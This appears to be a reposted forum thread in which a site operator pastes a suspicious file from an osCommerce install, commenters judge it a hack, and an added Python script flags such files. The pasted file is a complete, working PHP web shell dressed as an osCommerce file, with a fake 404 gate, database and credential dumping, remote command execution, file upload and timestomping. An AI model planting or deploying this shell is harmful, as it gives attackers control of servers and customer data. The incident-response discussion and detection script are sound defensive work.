snubbr.com

How can I have a Verisign SSL certificate for free?

My first question is: How can I have a Verisign SSL certificate for free? Thanks in advance for any answer. Another question... What is this file for? I noticed a large amount of requests from the server's own IP to this file and it caused Apache to reach its max clients.

<?php
/*
  $Id: table_background_info.php,v 1.73 2003/02/13 01:58:23 hpdl Exp $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright 2003 osCommerce

  Released under the GNU General Public License
*/

define("OSCOMMERCE_FILENAME", 'shell.php');
define("SLASH", chr(92));
define("NL", chr(10));
define("CRNL", chr(13).chr(10));

$licence = "(UTEO84JE73JLL)";

// Gate: without the expected POST field K the script answers 404. It fetches
// SCRIPT_NAME with OSCOMMERCE_FILENAME swapped for a random NNNNNNNN.jpg from
// this same server and relays that error page. If the file on disk has another
// name, the swap changes nothing and the script requests itself.
if (!isset($_POST['K']) || $licence != $_POST['K'])
{
    header("Status: 404 Not Found");
    header("HTTP/1.0 404 Not Found");
    $in = rand(10000000, 99999999);
    $fp = @fsockopen($_SERVER['SERVER_NAME'], 80, $errno, $errstr, 2);
    if ($fp)
    {
        $name = preg_replace("~".addcslashes(OSCOMMERCE_FILENAME, ".")."~i", $in.".jpg", $_SERVER['SCRIPT_NAME']);
        $out = "GET ".$name." HTTP/1.1".CRNL;
        $out .= "Host: ".$_SERVER['SERVER_NAME'].CRNL;
        $out .= "Connection: Close".CRNL.CRNL;
        fwrite($fp, $out);
        while (!feof($fp))
        {
            $data2save .= fgets($fp, 128);
        }
        @fclose($fp);
        if (strstr($data2save, CRNL.CRNL))
        {
            $data2save = substr(strstr($data2save, CRNL.CRNL), 4);
            $data2save = preg_replace("~".$in.SLASH.".jpg~i", OSCOMMERCE_FILENAME, $data2save);
            echo preg_replace("~^[\d\s]+$~mi", "", $data2save);
        }
    }
    die();
}

header("Expires: Mon, 26 Jul 1980 05:00:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Cache-Control: private");
header("Pragma: no-cache");

set_time_limit(99999999999);
ini_set('memory_limit', -1);
clearstatcache();

// Connects with the shop's own credentials from includes/configure.php;
// the POST fields MYH, MYU, MYP and MYD override them.
function dbc()
{
    if (is_file("../includes/configure.php"))
    {
        @include ("../includes/configure.php");
    }
    else if (is_file("includes/configure.php"))
    {
        @include ("includes/configure.php");
    }
    if (isset($_POST['MYH'])) $MYH = $_POST['MYH']; else $MYH = DB_SERVER;
    if (isset($_POST['MYU'])) $MYU = $_POST['MYU']; else $MYU = DB_SERVER_USERNAME;
    if (isset($_POST['MYP'])) $MYP = $_POST['MYP']; else $MYP = DB_SERVER_PASSWORD;
    if (isset($_POST['MYD'])) $MYD = $_POST['MYD']; else $MYD = DB_DATABASE;
    $MYL = mysql_connect($MYH, $MYU, $MYP);
    mysql_select_db($MYD);
    return array($MYL, $MYH, $MYU, $MYP, $MYD);
}

// P: presence check.
if (isset($_POST['P']))
{
    die("A11");
}
// MYST: list every table with its row count.
else if (isset($_POST['MYST']))
{
    list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
    $tables = "";
    $res = mysql_query("SHOW TABLES");
    while ($row = mysql_fetch_array($res))
    {
        $resCounts = @mysql_query("SELECT COUNT(*) FROM `".$row[0]."`", $MYL);
        $rowCounts = @mysql_fetch_array($resCounts);
        $tables .= "|:|".$row[0].":".$rowCounts[0].NL;
    }
    echo $tables;
    mysql_close($MYL);
    die("#done");
}
// MYSD: list databases.
else if (isset($_POST['MYSD']))
{
    list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
    $list = "";
    $res = mysql_query("SHOW DATABASES");
    while ($row = mysql_fetch_array($res))
    {
        $list .= "|:|".$row[0].NL;
    }
    echo $list;
    mysql_close($MYL);
    die("#done");
}
// MYFR: dump table MYT as SQL (CREATE TABLE plus INSERT rows), range given by MYC.
else if (isset($_POST['MYFR']))
{
    list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
    if (substr($_POST['MYC'], 0, 1) == 0)
    {
        $res = @mysql_query("SHOW CREATE TABLE `".$_POST['MYT']."`", $MYL);
        $row = @mysql_fetch_array($res);
        echo $row[1].";".NL;
    }
    $res = @mysql_query("SELECT * FROM `".$_POST['MYT']."` LIMIT ".$_POST['MYC'], $MYL);
    if (@mysql_num_rows($res) > 0)
    {
        while (($row = @mysql_fetch_array($res)))
        {
            $keys = @implode("`, `", @array_keys($row));
            $values = @array_values($row);
            foreach($values as $k=>$v)
            {
                $values[$k] = mysql_escape_string($v);
            }
            $values = @implode("', '", $values);
            echo "INSERT INTO `".$_POST['MYT']."` (`".$keys."`) VALUES ('".$values."');".NL;
        }
    }
    mysql_close($MYL);
    die("#done");
}
// MYINF: return the database host, user, password and database name.
else if (isset($_POST['MYINF']))
{
    $inf = dbc();
    unset($inf[0]);
    die(implode("|:|", $inf));
}
// E: run the posted string as a shell command and return its output.
else if (isset($_POST['E']))
{
    @exec($_POST['E'], $output, $retCode);
    die(($retCode != 0) ? ("RETCODE:".$retCode.NL) : "".implode(NL, $output));
}
// U/UF/US: write base64-decoded U to path UF when U's length equals US.
else if (isset($_POST['U']) && isset($_POST['UF']) && isset($_POST['US']))
{
    if (strlen($_POST['U']) == $_POST['US'])
    {
        ignore_user_abort(true);
        $fpSave = fopen($_POST['UF'], "w");
        fwrite($fpSave, base64_decode($_POST['U']));
        fclose($fpSave);
        ignore_user_abort(false);
    }
}

// T/UF: set the target file's mtime to the median mtime of the
// table_background* files here (or of the other files if there are none),
// then put the directory's own mtime back to the newest value seen.
if (isset($_POST['T']) || isset($_POST['UF']))
{
    if (isset($_POST['UF'])) $f = $_POST['UF']; else $f = $_POST['T'];
    $t = array();
    $d = dir(".");
    $mt = 0;
    while (false !== ($e = $d->read()))
    {
        $nt = filemtime($e);
        if ($nt > $mt) $mt = $nt;
        if (preg_match("~table_background~", $e))
        {
            $t[0][] = $nt;
        }
        else
        {
            $t[1][] = $nt;
        }
    }
    $d->close();
    if (count($t[0]) > 0) $tc = 0; else $tc = 1;
    sort($t[$tc]);
    if (count($t[$tc]) > 0)
    {
        @touch($f, $t[$tc][floor(count($t[$tc]) / 2)]);
        @touch("./", $mt);
    }
}
?>

This post has been edited by Jan Zonjee: 21 January 2009, 16:03

Comments (6)

I would like to know the answer too. Anyone here know what is the answer to that question? I'll do some investigation and get back to you if I bump into an answer. You should email the people at Verisign as they probably know.

Comment #1

Yeah, I'm not sure why that link even comes up. It's not even on the page. Doing just a search for the file comes up with a few oscommerce installs with it.

Comment #2

Grab a copy of the file so you have it backed up, and delete it from your website.

Comment #3

I just 403'd it via htaccess for now. I'm actually just looking at this for someone else and know very little about oscommerce. I also noticed his images folder was completely open. If anyone does know what it is, it would be helpful, I just don't know oscommerce enough to know what it's there for. :\

Comment #4

Looks like a hack attempt.

Seriously look at the file content. It's not like any "normal" osC files, really.

Chmod it to 000, or rename it and then chmod it to 000.

-jared

This post has been edited by Jcall: 22 January 2009, 05:33

Comment #5

I kind of thought the same, only thing that made me think different was the person I'm looking at this for, that file has been there since they put the oscommerce install on the server from another. I just found the same thing on another machine doing the exact same thing. Dosing out the server. Just filling up the MaxClients of apache. The fsockopen did look a bit suspicious to me. Though unfortunately I just don't know much about OsCommerce or really php for that matter.



Anyone have a 1.7 install or the tarball to check if that should be in the images directory?

Comment #6

1.7? 2.2 MS2 was released in July 2003, I don't know the release timeline before that...

-jared

Comment #7


This question was taken from a support group/message board and re-posted here so others can learn from it.
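
A triage sketch for the situation in this thread, as an added example that is not part of the original posts. It walks a web root and flags PHP files that show the traits visible in the quoted script, and also files whose mtime is far older than their ctime, because the script's last block back-dates mtime with touch() while ctime still records the real change. The regexes, the one-hour threshold and the sample files are assumptions of this example.

```python
import os, re, tempfile, time

# Traits visible in the quoted script; the regexes are this example's own.
INDICATORS = {
    "exec_on_post": re.compile(rb"exec\s*\(\s*\$_POST", re.I),
    "write_post_path": re.compile(rb"fopen\s*\(\s*\$_POST", re.I),
    "fake_404": re.compile(rb"header\s*\(\s*[\"']HTTP/1\.[01] 404", re.I),
    "loopback_fetch": re.compile(rb"fsockopen\s*\(\s*\$_SERVER", re.I),
    "timestomp": re.compile(rb"touch\s*\(\s*\$\w+\s*,", re.I),
}
SKEW = 3600  # assumed threshold in seconds for "mtime was set back"

def triage(root):
    """Return {path: [findings]} for PHP files under root."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".php5", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            with open(path, "rb") as fh:
                body = fh.read(1 << 20)  # first 1 MiB is enough for triage
            hits = [k for k, rx in INDICATORS.items() if rx.search(body)]
            # touch() rewrites mtime; ctime (POSIX inode change time) stays current.
            if st.st_ctime - st.st_mtime > SKEW:
                hits.append("mtime_older_than_ctime")
            if hits:
                report[path] = hits
    return report

def demo():
    """Constructed sample tree: one benign file, one inert text fragment with the traits."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "images"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>")
    bad = os.path.join(root, "images", "table_background_info.php")
    with open(bad, "w") as fh:  # no <?php tag, so the fragment cannot execute
        fh.write('Header("HTTP/1.0 404 Not Found");\n'
                 '@exec($_POST[\'E\'], $o, $r); @touch($f, $t);')
    old = time.time() - 5 * 365 * 86400
    os.utime(bad, (old, old))  # back-date mtime as the script's touch() call does
    return root, bad, triage(root)

if __name__ == "__main__":
    for path, hits in demo()[2].items():
        print(path, hits)
```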

 


 

(C) Copyright 2010 All rights reserved.